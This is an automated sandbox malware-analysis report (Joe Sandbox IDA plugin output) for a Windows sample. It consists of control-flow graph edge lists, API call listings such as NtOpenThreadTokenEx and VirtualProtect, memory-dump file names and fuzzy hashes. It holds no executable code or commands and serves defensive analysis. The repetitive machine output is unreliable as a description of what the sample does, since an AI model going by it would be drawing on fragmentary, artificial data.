7ff6e17d1394 2 API calls 3216->3218 3217->3216 3219 7ff6e17d15df 3218->3219 3220 7ff6e17d15e4 3219->3220 3221 7ff6e17d1394 2 API calls 3219->3221 3222 7ff6e17d1394 2 API calls 3220->3222 3221->3220 3223 7ff6e17d15f3 3222->3223 3223->2741 3225 7ff6e17d1394 2 API calls 3224->3225 3226 7ff6e17d15f3 3225->3226 3226->2744 3228 7ff6e17d1394 2 API calls 3227->3228 3229 7ff6e17d15b7 3228->3229 3230 7ff6e17d15c6 3229->3230 3231 7ff6e17d1394 2 API calls 3229->3231 3232 7ff6e17d1394 2 API calls 3230->3232 3231->3230 3233 7ff6e17d15d0 3232->3233 3234 7ff6e17d15d5 3233->3234 3235 7ff6e17d1394 2 API calls 3233->3235 3236 7ff6e17d1394 2 API calls 3234->3236 3235->3234 3237 7ff6e17d15df 3236->3237 3238 7ff6e17d15e4 3237->3238 3239 7ff6e17d1394 2 API calls 3237->3239 3240 7ff6e17d1394 2 API calls 3238->3240 3239->3238 3241 7ff6e17d15f3 3240->3241 3241->2763 3241->2764 3243 7ff6e17d1394 2 API calls 3242->3243 3244 
7ff6e17d153f 3243->3244 3245 7ff6e17d1394 2 API calls 3244->3245 3246 7ff6e17d154e 3245->3246 3247 7ff6e17d1394 2 API calls 3246->3247 3248 7ff6e17d155d 3247->3248 3249 7ff6e17d1394 2 API calls 3248->3249 3250 7ff6e17d156c 3249->3250 3251 7ff6e17d1394 2 API calls 3250->3251 3252 7ff6e17d157b 3251->3252 3253 7ff6e17d1394 2 API calls 3252->3253 3254 7ff6e17d158a 3253->3254 3255 7ff6e17d1394 2 API calls 3254->3255 3256 7ff6e17d1599 3255->3256 3257 7ff6e17d1394 2 API calls 3256->3257 3258 7ff6e17d15a8 3257->3258 3259 7ff6e17d1394 2 API calls 3258->3259 3260 7ff6e17d15b7 3259->3260 3261 7ff6e17d15c6 3260->3261 3262 7ff6e17d1394 2 API calls 3260->3262 3263 7ff6e17d1394 2 API calls 3261->3263 3262->3261 3264 7ff6e17d15d0 3263->3264 3265 7ff6e17d15d5 3264->3265 3266 7ff6e17d1394 2 API calls 3264->3266 3267 7ff6e17d1394 2 API calls 3265->3267 3266->3265 3268 7ff6e17d15df 3267->3268 3269 7ff6e17d15e4 3268->3269 3270 7ff6e17d1394 2 API calls 3268->3270 3271 7ff6e17d1394 2 API calls 3269->3271 3270->3269 3272 7ff6e17d15f3 3271->3272 3272->2787 3272->2788 3274 7ff6e17d14b8 3273->3274 3275 7ff6e17d1394 2 API calls 3273->3275 3276 7ff6e17d1394 2 API calls 3274->3276 3275->3274 3277 7ff6e17d14c2 3276->3277 3278 7ff6e17d14c7 3277->3278 3279 7ff6e17d1394 2 API calls 3277->3279 3280 7ff6e17d1394 2 API calls 3278->3280 3279->3278 3281 7ff6e17d14d6 3280->3281 3282 7ff6e17d1394 2 API calls 3281->3282 3283 7ff6e17d14e0 3282->3283 3284 7ff6e17d14e5 3283->3284 3285 7ff6e17d1394 2 API calls 3283->3285 3286 7ff6e17d1394 2 API calls 3284->3286 3285->3284 3287 7ff6e17d14ef 3286->3287 3288 7ff6e17d14f4 3287->3288 3289 7ff6e17d1394 2 API calls 3287->3289 3290 7ff6e17d1394 2 API calls 3288->3290 3289->3288 3291 7ff6e17d14fe 3290->3291 3292 7ff6e17d1503 3291->3292 3293 7ff6e17d1394 2 API calls 3291->3293 3294 7ff6e17d1394 2 API calls 3292->3294 3293->3292 3295 7ff6e17d150d 3294->3295 3296 7ff6e17d1394 2 API calls 3295->3296 3297 7ff6e17d1512 3296->3297 3298 7ff6e17d1394 2 API calls 3297->3298 3299 
7ff6e17d1521 3298->3299 3300 7ff6e17d1394 2 API calls 3299->3300 3301 7ff6e17d1530 3300->3301 3302 7ff6e17d1394 2 API calls 3301->3302 3303 7ff6e17d153f 3302->3303 3304 7ff6e17d1394 2 API calls 3303->3304 3305 7ff6e17d154e 3304->3305 3306 7ff6e17d1394 2 API calls 3305->3306 3307 7ff6e17d155d 3306->3307 3308 7ff6e17d1394 2 API calls 3307->3308 3309 7ff6e17d156c 3308->3309 3310 7ff6e17d1394 2 API calls 3309->3310 3311 7ff6e17d157b 3310->3311 3312 7ff6e17d1394 2 API calls 3311->3312 3313 7ff6e17d158a 3312->3313 3314 7ff6e17d1394 2 API calls 3313->3314 3315 7ff6e17d1599 3314->3315 3316 7ff6e17d1394 2 API calls 3315->3316 3317 7ff6e17d15a8 3316->3317 3318 7ff6e17d1394 2 API calls 3317->3318 3319 7ff6e17d15b7 3318->3319 3320 7ff6e17d15c6 3319->3320 3321 7ff6e17d1394 2 API calls 3319->3321 3322 7ff6e17d1394 2 API calls 3320->3322 3321->3320 3323 7ff6e17d15d0 3322->3323 3324 7ff6e17d15d5 3323->3324 3325 7ff6e17d1394 2 API calls 3323->3325 3326 7ff6e17d1394 2 API calls 3324->3326 3325->3324 3327 7ff6e17d15df 3326->3327 3328 7ff6e17d15e4 3327->3328 3329 7ff6e17d1394 2 API calls 3327->3329 3330 7ff6e17d1394 2 API calls 3328->3330 3329->3328 3331 7ff6e17d15f3 3330->3331 3331->2795 3332 7ff6e17d1440 3331->3332 3333 7ff6e17d1394 2 API calls 3332->3333 3334 7ff6e17d144f 3333->3334 3335 7ff6e17d1394 2 API calls 3334->3335 3336 7ff6e17d145e 3335->3336 3337 7ff6e17d1394 2 API calls 3336->3337 3338 7ff6e17d146d 3337->3338 3339 7ff6e17d1394 2 API calls 3338->3339 3340 7ff6e17d147c 3339->3340 3341 7ff6e17d1394 2 API calls 3340->3341 3342 7ff6e17d148b 3341->3342 3343 7ff6e17d1394 2 API calls 3342->3343 3344 7ff6e17d149a 3343->3344 3345 7ff6e17d1394 2 API calls 3344->3345 3346 7ff6e17d14a9 3345->3346 3347 7ff6e17d14b8 3346->3347 3348 7ff6e17d1394 2 API calls 3346->3348 3349 7ff6e17d1394 2 API calls 3347->3349 3348->3347 3350 7ff6e17d14c2 3349->3350 3351 7ff6e17d14c7 3350->3351 3352 7ff6e17d1394 2 API calls 3350->3352 3353 7ff6e17d1394 2 API calls 3351->3353 3352->3351 3354 7ff6e17d14d6 
3353->3354 3355 7ff6e17d1394 2 API calls 3354->3355 3356 7ff6e17d14e0 3355->3356 3357 7ff6e17d14e5 3356->3357 3358 7ff6e17d1394 2 API calls 3356->3358 3359 7ff6e17d1394 2 API calls 3357->3359 3358->3357 3360 7ff6e17d14ef 3359->3360 3361 7ff6e17d14f4 3360->3361 3362 7ff6e17d1394 2 API calls 3360->3362 3363 7ff6e17d1394 2 API calls 3361->3363 3362->3361 3364 7ff6e17d14fe 3363->3364 3365 7ff6e17d1503 3364->3365 3366 7ff6e17d1394 2 API calls 3364->3366 3367 7ff6e17d1394 2 API calls 3365->3367 3366->3365 3368 7ff6e17d150d 3367->3368 3369 7ff6e17d1394 2 API calls 3368->3369 3370 7ff6e17d1512 3369->3370 3371 7ff6e17d1394 2 API calls 3370->3371 3372 7ff6e17d1521 3371->3372 3373 7ff6e17d1394 2 API calls 3372->3373 3374 7ff6e17d1530 3373->3374 3375 7ff6e17d1394 2 API calls 3374->3375 3376 7ff6e17d153f 3375->3376 3377 7ff6e17d1394 2 API calls 3376->3377 3378 7ff6e17d154e 3377->3378 3379 7ff6e17d1394 2 API calls 3378->3379 3380 7ff6e17d155d 3379->3380 3381 7ff6e17d1394 2 API calls 3380->3381 3382 7ff6e17d156c 3381->3382 3383 7ff6e17d1394 2 API calls 3382->3383 3384 7ff6e17d157b 3383->3384 3385 7ff6e17d1394 2 API calls 3384->3385 3386 7ff6e17d158a 3385->3386 3387 7ff6e17d1394 2 API calls 3386->3387 3388 7ff6e17d1599 3387->3388 3389 7ff6e17d1394 2 API calls 3388->3389 3390 7ff6e17d15a8 3389->3390 3391 7ff6e17d1394 2 API calls 3390->3391 3392 7ff6e17d15b7 3391->3392 3393 7ff6e17d15c6 3392->3393 3394 7ff6e17d1394 2 API calls 3392->3394 3395 7ff6e17d1394 2 API calls 3393->3395 3394->3393 3396 7ff6e17d15d0 3395->3396 3397 7ff6e17d15d5 3396->3397 3398 7ff6e17d1394 2 API calls 3396->3398 3399 7ff6e17d1394 2 API calls 3397->3399 3398->3397 3400 7ff6e17d15df 3399->3400 3401 7ff6e17d15e4 3400->3401 3402 7ff6e17d1394 2 API calls 3400->3402 3403 7ff6e17d1394 2 API calls 3401->3403 3402->3401 3404 7ff6e17d15f3 3403->3404 3404->2795 3404->2808 3406 7ff6e17d35c1 memset 3405->3406 3410 7ff6e17d33c3 3405->3410 3408 7ff6e17d35e6 3406->3408 3407 7ff6e17d343a memset 3407->3410 3409 7ff6e17d362b 
wcscpy wcscat wcslen 3408->3409 3411 7ff6e17d1422 2 API calls 3409->3411 3410->3406 3410->3407 3412 7ff6e17d3493 wcscpy wcscat wcslen 3410->3412 3418 7ff6e17d145e 2 API calls 3410->3418 3420 7ff6e17d3579 3410->3420 3413 7ff6e17d3728 3411->3413 3690 7ff6e17d1422 3412->3690 3415 7ff6e17d3767 3413->3415 3767 7ff6e17d1431 3413->3767 3421 7ff6e17d14c7 3415->3421 3418->3410 3419 7ff6e17d145e 2 API calls 3419->3415 3420->3406 3422 7ff6e17d1394 2 API calls 3421->3422 3423 7ff6e17d14d6 3422->3423 3424 7ff6e17d1394 2 API calls 3423->3424 3425 7ff6e17d14e0 3424->3425 3426 7ff6e17d14e5 3425->3426 3427 7ff6e17d1394 2 API calls 3425->3427 3428 7ff6e17d1394 2 API calls 3426->3428 3427->3426 3429 7ff6e17d14ef 3428->3429 3430 7ff6e17d14f4 3429->3430 3431 7ff6e17d1394 2 API calls 3429->3431 3432 7ff6e17d1394 2 API calls 3430->3432 3431->3430 3433 7ff6e17d14fe 3432->3433 3434 7ff6e17d1503 3433->3434 3435 7ff6e17d1394 2 API calls 3433->3435 3436 7ff6e17d1394 2 API calls 3434->3436 3435->3434 3437 7ff6e17d150d 3436->3437 3438 7ff6e17d1394 2 API calls 3437->3438 3439 7ff6e17d1512 3438->3439 3440 7ff6e17d1394 2 API calls 3439->3440 3441 7ff6e17d1521 3440->3441 3442 7ff6e17d1394 2 API calls 3441->3442 3443 7ff6e17d1530 3442->3443 3444 7ff6e17d1394 2 API calls 3443->3444 3445 7ff6e17d153f 3444->3445 3446 7ff6e17d1394 2 API calls 3445->3446 3447 7ff6e17d154e 3446->3447 3448 7ff6e17d1394 2 API calls 3447->3448 3449 7ff6e17d155d 3448->3449 3450 7ff6e17d1394 2 API calls 3449->3450 3451 7ff6e17d156c 3450->3451 3452 7ff6e17d1394 2 API calls 3451->3452 3453 7ff6e17d157b 3452->3453 3454 7ff6e17d1394 2 API calls 3453->3454 3455 7ff6e17d158a 3454->3455 3456 7ff6e17d1394 2 API calls 3455->3456 3457 7ff6e17d1599 3456->3457 3458 7ff6e17d1394 2 API calls 3457->3458 3459 7ff6e17d15a8 3458->3459 3460 7ff6e17d1394 2 API calls 3459->3460 3461 7ff6e17d15b7 3460->3461 3462 7ff6e17d15c6 3461->3462 3463 7ff6e17d1394 2 API calls 3461->3463 3464 7ff6e17d1394 2 API calls 3462->3464 3463->3462 3465 7ff6e17d15d0 
3464->3465 3466 7ff6e17d15d5 3465->3466 3467 7ff6e17d1394 2 API calls 3465->3467 3468 7ff6e17d1394 2 API calls 3466->3468 3467->3466 3469 7ff6e17d15df 3468->3469 3470 7ff6e17d15e4 3469->3470 3471 7ff6e17d1394 2 API calls 3469->3471 3472 7ff6e17d1394 2 API calls 3470->3472 3471->3470 3473 7ff6e17d15f3 3472->3473 3473->2824 3475 7ff6e17d2f88 3474->3475 3476 7ff6e17d14a9 2 API calls 3475->3476 3477 7ff6e17d2fd0 3476->3477 3477->2796 3479 7ff6e17d2690 10 API calls 3478->3479 3480 7ff6e17d391e 3479->3480 3481 7ff6e17d3b21 3480->3481 3482 7ff6e17d14a9 2 API calls 3480->3482 3481->2809 3483 7ff6e17d3967 3482->3483 3490 7ff6e17d3b28 3483->3490 3842 7ff6e17d14b8 3483->3842 3486 7ff6e17d3a87 memset 3906 7ff6e17d148b 3486->3906 3489 7ff6e17d14b8 2 API calls 3492 7ff6e17d398f 3489->3492 4095 7ff6e17d15c6 3490->4095 3492->3486 3492->3489 3899 7ff6e17d15d5 3492->3899 3495 7ff6e17d14b8 2 API calls 3496 7ff6e17d3b07 3495->3496 3496->3490 3497 7ff6e17d3b0b 3496->3497 4030 7ff6e17d147c 3497->4030 3500 7ff6e17d145e 2 API calls 3500->3481 3502 7ff6e17d8320 malloc 3501->3502 3503 7ff6e17d13b8 3502->3503 3504 7ff6e17d13c6 NtOpenThreadTokenEx 3503->3504 3504->2866 3506 7ff6e17d266f 3505->3506 3506->3026 3506->3506 3575 7ff6e17d155d 3507->3575 3509 7ff6e17d27f4 3511 7ff6e17d14c7 2 API calls 3509->3511 3510 7ff6e17d2d27 3514 7ff6e17d2816 3511->3514 3512 7ff6e17d2785 wcsncmp 3600 7ff6e17d14e5 3512->3600 3516 7ff6e17d1503 2 API calls 3514->3516 3517 7ff6e17d283d 3516->3517 3518 7ff6e17d2847 memset 3517->3518 3519 7ff6e17d2877 3518->3519 3520 7ff6e17d28bc wcscpy wcscat wcslen 3519->3520 3521 7ff6e17d28ee wcslen 3520->3521 3522 7ff6e17d291a 3520->3522 3521->3522 3523 7ff6e17d2967 wcslen 3522->3523 3526 7ff6e17d2985 3522->3526 3523->3526 3524 7ff6e17d29d9 wcslen 3525 7ff6e17d14a9 2 API calls 3524->3525 3527 7ff6e17d2a73 3525->3527 3526->3510 3526->3524 3528 7ff6e17d14a9 2 API calls 3527->3528 3529 7ff6e17d2bd2 3528->3529 3647 7ff6e17d14f4 3529->3647 3532 7ff6e17d14c7 2 API calls 3533 
7ff6e17d2c99 3532->3533 3534 7ff6e17d14c7 2 API calls 3533->3534 3535 7ff6e17d2cb1 3534->3535 3536 7ff6e17d145e 2 API calls 3535->3536 3537 7ff6e17d2cbb 3536->3537 3538 7ff6e17d145e 2 API calls 3537->3538 3539 7ff6e17d2cc5 3538->3539 3539->3029 3541 7ff6e17d1394 2 API calls 3540->3541 3542 7ff6e17d1521 3541->3542 3543 7ff6e17d1394 2 API calls 3542->3543 3544 7ff6e17d1530 3543->3544 3545 7ff6e17d1394 2 API calls 3544->3545 3546 7ff6e17d153f 3545->3546 3547 7ff6e17d1394 2 API calls 3546->3547 3548 7ff6e17d154e 3547->3548 3549 7ff6e17d1394 2 API calls 3548->3549 3550 7ff6e17d155d 3549->3550 3551 7ff6e17d1394 2 API calls 3550->3551 3552 7ff6e17d156c 3551->3552 3553 7ff6e17d1394 2 API calls 3552->3553 3554 7ff6e17d157b 3553->3554 3555 7ff6e17d1394 2 API calls 3554->3555 3556 7ff6e17d158a 3555->3556 3557 7ff6e17d1394 2 API calls 3556->3557 3558 7ff6e17d1599 3557->3558 3559 7ff6e17d1394 2 API calls 3558->3559 3560 7ff6e17d15a8 3559->3560 3561 7ff6e17d1394 2 API calls 3560->3561 3562 7ff6e17d15b7 3561->3562 3563 7ff6e17d15c6 3562->3563 3564 7ff6e17d1394 2 API calls 3562->3564 3565 7ff6e17d1394 2 API calls 3563->3565 3564->3563 3566 7ff6e17d15d0 3565->3566 3567 7ff6e17d15d5 3566->3567 3568 7ff6e17d1394 2 API calls 3566->3568 3569 7ff6e17d1394 2 API calls 3567->3569 3568->3567 3570 7ff6e17d15df 3569->3570 3571 7ff6e17d15e4 3570->3571 3572 7ff6e17d1394 2 API calls 3570->3572 3573 7ff6e17d1394 2 API calls 3571->3573 3572->3571 3574 7ff6e17d15f3 3573->3574 3574->3031 3576 7ff6e17d1394 2 API calls 3575->3576 3577 7ff6e17d156c 3576->3577 3578 7ff6e17d1394 2 API calls 3577->3578 3579 7ff6e17d157b 3578->3579 3580 7ff6e17d1394 2 API calls 3579->3580 3581 7ff6e17d158a 3580->3581 3582 7ff6e17d1394 2 API calls 3581->3582 3583 7ff6e17d1599 3582->3583 3584 7ff6e17d1394 2 API calls 3583->3584 3585 7ff6e17d15a8 3584->3585 3586 7ff6e17d1394 2 API calls 3585->3586 3587 7ff6e17d15b7 3586->3587 3588 7ff6e17d15c6 3587->3588 3589 7ff6e17d1394 2 API calls 3587->3589 3590 7ff6e17d1394 2 API calls 
Control-flow graph (edge list): a long chain of basic blocks in the range 00007FF6E17D1394 to 00007FF6E17D15F3, each of which calls 00007FF6E17D1394 (2 API calls) and falls through to the next block; 00007FF6E17D1394 itself reaches NtOpenThreadTokenEx and malloc. Separate components cover 00007FF6E17D1000 (__set_app_type, __setusermatherr), 00007FF6E17D1800 (fprintf), 00007FF6E17D2320 (strlen), 00007FF6E17D1A70 / 00007FF6E17D199E (VirtualProtect), 00007FF6E17D216F (InitializeCriticalSection), 00007FF6E17D1FD0 and 00007FF6E17D2050 (EnterCriticalSection, LeaveCriticalSection, free), and 00007FF6E17D1E10 / 00007FF6E17D1F47 (signal).

Control-flow Graph

APIs
Memory Dump Source
• Source File: 00000000.00000002.1804645116.00007FF6E17D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E17D0000, based on PE: true
• Associated: 00000000.00000002.1804600007.00007FF6E17D0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1804669441.00007FF6E17D9000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1804690414.00007FF6E17DB000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1804711415.00007FF6E17DC000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1805354917.00007FF6E1A58000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1805577027.00007FF6E1A5A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1805641150.00007FF6E1A5D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6e17d0000_aA45th2ixY.jbxd
Similarity
• API ID: malloc$ExceptionFilterSleepUnhandled_amsg_exit_cexit_inittermmemcpystrlen
• String ID:
• API String ID: 2643109117-0
• Opcode ID: 7dc0e20ee06a047c58c8969f60c7aa9bc1c695feb4ea1f1336e2537d86a415e6
• Instruction ID: 8721468547df2c7e35ec2c08cf007f65924c3086fc33d8843986c66394aeb3c9
• Opcode Fuzzy Hash: 7dc0e20ee06a047c58c8969f60c7aa9bc1c695feb4ea1f1336e2537d86a415e6
• Instruction Fuzzy Hash: 61514233A1D64A81FF109B55E95137927A1BF96F90F044032C94DC73A3DE3FA4A5AB0A

Control-flow Graph

APIs
• NtOpenThreadTokenEx.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6E17D1156), ref: 00007FF6E17D13F7
Memory Dump Source
• Source File: 00000000.00000002.1804645116.00007FF6E17D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E17D0000, based on PE: true
• Associated: 00000000.00000002.1804600007.00007FF6E17D0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1804669441.00007FF6E17D9000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1804690414.00007FF6E17DB000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1804711415.00007FF6E17DC000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1805354917.00007FF6E1A58000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1805577027.00007FF6E1A5A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1805641150.00007FF6E1A5D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6e17d0000_aA45th2ixY.jbxd
Similarity
• API ID: OpenThreadToken
• String ID:
• API String ID: 3674800776-0
• Opcode ID: 856890430328471108b496156552b481e7f8763a777f6ca6df0782f1e0c8bf26
• Instruction ID: 53270731c6d2b93ad874f7acd510b236f6e0d8e98c196d79274192b56cdded90
• Opcode Fuzzy Hash: 856890430328471108b496156552b481e7f8763a777f6ca6df0782f1e0c8bf26
• Instruction Fuzzy Hash: 02F0FF7390CB4982DB14CB51F85022A7B60FB8BB80F009439E99C93726DF3DE0609F49
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1804645116.00007FF6E17D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E17D0000, based on PE: true
• Associated: 00000000.00000002.1804600007.00007FF6E17D0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1804669441.00007FF6E17D9000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1804690414.00007FF6E17DB000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1804711415.00007FF6E17DC000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1805354917.00007FF6E1A58000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1805577027.00007FF6E1A5A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1805641150.00007FF6E1A5D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6e17d0000_aA45th2ixY.jbxd
Similarity
• API ID: wcslen$memset$wcscat$wcscpy$_wcsnicmp$memcpy$_wcsicmp
• String ID: $Cj$
• API String ID: 3604702941-2283968559
• Opcode ID: 977a8b60ba0579ddc254c121587a38851822c67f71bdae5852861dd88830eb9e
• Instruction ID: 34c3b76d185647ec9ecd6cb9e9f361323ebf4ce6952f5fec0f88e217d63c9e73
• Opcode Fuzzy Hash: 977a8b60ba0579ddc254c121587a38851822c67f71bdae5852861dd88830eb9e
• Instruction Fuzzy Hash: FE53B363D2C6C684FB218B2DE8013F42360BF96744F445236D98ED55A2EF6E6294E70F

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1804645116.00007FF6E17D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E17D0000, based on PE: true
• Associated: 00000000.00000002.1804600007.00007FF6E17D0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1804669441.00007FF6E17D9000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1804690414.00007FF6E17DB000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1804711415.00007FF6E17DC000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1805354917.00007FF6E1A58000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1805577027.00007FF6E1A5A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1805641150.00007FF6E1A5D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6e17d0000_aA45th2ixY.jbxd
Similarity
• API ID: wcslen$memsetwcscatwcscpywcsncmp
• String ID: 0$Cj$$X$`
• API String ID: 329590056-3100607097
• Opcode ID: b8983a0e767351e41f8a2dd7f3a744f191a8cf509c30d2e12db373b54b78512d
• Instruction ID: 6756c7d70eb6b1da3eab7d99ecf47820deeb9eabba0ad61c0368d87a5103d665
• Opcode Fuzzy Hash: b8983a0e767351e41f8a2dd7f3a744f191a8cf509c30d2e12db373b54b78512d
• Instruction Fuzzy Hash: 6F028F23A1CBC581E7208B19F8043AA77A0FB85B94F404236DA9C837E6DF3DD199DB05

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1804645116.00007FF6E17D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E17D0000, based on PE: true
• Associated: 00000000.00000002.1804600007.00007FF6E17D0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1804669441.00007FF6E17D9000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1804690414.00007FF6E17DB000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1804711415.00007FF6E17DC000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1805354917.00007FF6E1A58000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1805577027.00007FF6E1A5A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1805641150.00007FF6E1A5D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6e17d0000_aA45th2ixY.jbxd
Similarity
• API ID: memset$wcscatwcscpywcslen
• String ID: $0$0$@$@
• API String ID: 4263182637-1413854666
• Opcode ID: 70e93ec6abdd1a4cc0d18cd6ed6ff85189439c08585699d39736934ea620586d
• Instruction ID: 10a1c99994dff963448b00d6b7b0f3b52168f8a8bff714ef2c0b099c7b5c27ed
• Opcode Fuzzy Hash: 70e93ec6abdd1a4cc0d18cd6ed6ff85189439c08585699d39736934ea620586d
• Instruction Fuzzy Hash: 25B1F263A1C6C585F7218B29F4053BB77A0FF81744F400235EA8D82696DF7ED199EB0A

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • VirtualQuery.KERNEL32(?,?,?,?,00007FF6E17DA4DC,00007FF6E17DA4DC,?,?,00007FF6E17D0000,?,00007FF6E17D1991), ref: 00007FF6E17D1C63
                                                                  • VirtualProtect.KERNEL32(?,?,?,?,00007FF6E17DA4DC,00007FF6E17DA4DC,?,?,00007FF6E17D0000,?,00007FF6E17D1991), ref: 00007FF6E17D1CC7
                                                                  • memcpy.MSVCRT ref: 00007FF6E17D1CE0
                                                                  • GetLastError.KERNEL32(?,?,?,?,00007FF6E17DA4DC,00007FF6E17DA4DC,?,?,00007FF6E17D0000,?,00007FF6E17D1991), ref: 00007FF6E17D1D23
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1804645116.00007FF6E17D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E17D0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1804600007.00007FF6E17D0000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1804669441.00007FF6E17D9000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1804690414.00007FF6E17DB000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1804711415.00007FF6E17DC000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1805354917.00007FF6E1A58000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1805577027.00007FF6E1A5A000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1805641150.00007FF6E1A5D000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff6e17d0000_aA45th2ixY.jbxd
                                                                  Similarity
                                                                  • API ID: Virtual$ErrorLastProtectQuerymemcpy
                                                                  • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
                                                                  • API String ID: 2595394609-2123141913
                                                                  • Opcode ID: 60cf6631d5d8fe02d76019b25bf8b166b3865f8fdb2b66b6f59c16a09724d6a7
                                                                  • Instruction ID: 5e09ccdaefcf6fcd6f789a6a08f96452b9cd440191071d6e31d9eddd691f3465
                                                                  • Opcode Fuzzy Hash: 60cf6631d5d8fe02d76019b25bf8b166b3865f8fdb2b66b6f59c16a09724d6a7
                                                                  • Instruction Fuzzy Hash: 65418363A0864A81EF119B46E4447B827A0FB46F80F554132DD0EC7792DE3EE595EB0A

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1804645116.00007FF6E17D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E17D0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1804600007.00007FF6E17D0000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1804669441.00007FF6E17D9000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1804690414.00007FF6E17DB000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1804711415.00007FF6E17DC000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1805354917.00007FF6E1A58000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1805577027.00007FF6E1A5A000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1805641150.00007FF6E1A5D000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff6e17d0000_aA45th2ixY.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection$DeleteEnterErrorLastLeaveValuefree
                                                                  • String ID:
                                                                  • API String ID: 3326252324-0
                                                                  • Opcode ID: 277a831d8e060c36ae463728c8f60050fbb842899c4e9a066aa8a6c99444941f
                                                                  • Instruction ID: 9d3ee39dcaf6dd9e1368e7eb7fcff84f0f93d848d9de8c732f5a714fa5b560e2
                                                                  • Opcode Fuzzy Hash: 277a831d8e060c36ae463728c8f60050fbb842899c4e9a066aa8a6c99444941f
                                                                  • Instruction Fuzzy Hash: 7B21F322B0D54A81EB169B16E9003382261BF12F91F464431DD5DD76A1DF7FF8A3AA0A

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1804645116.00007FF6E17D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E17D0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1804600007.00007FF6E17D0000.00000002.00000001.01000000.00000003.sdmp
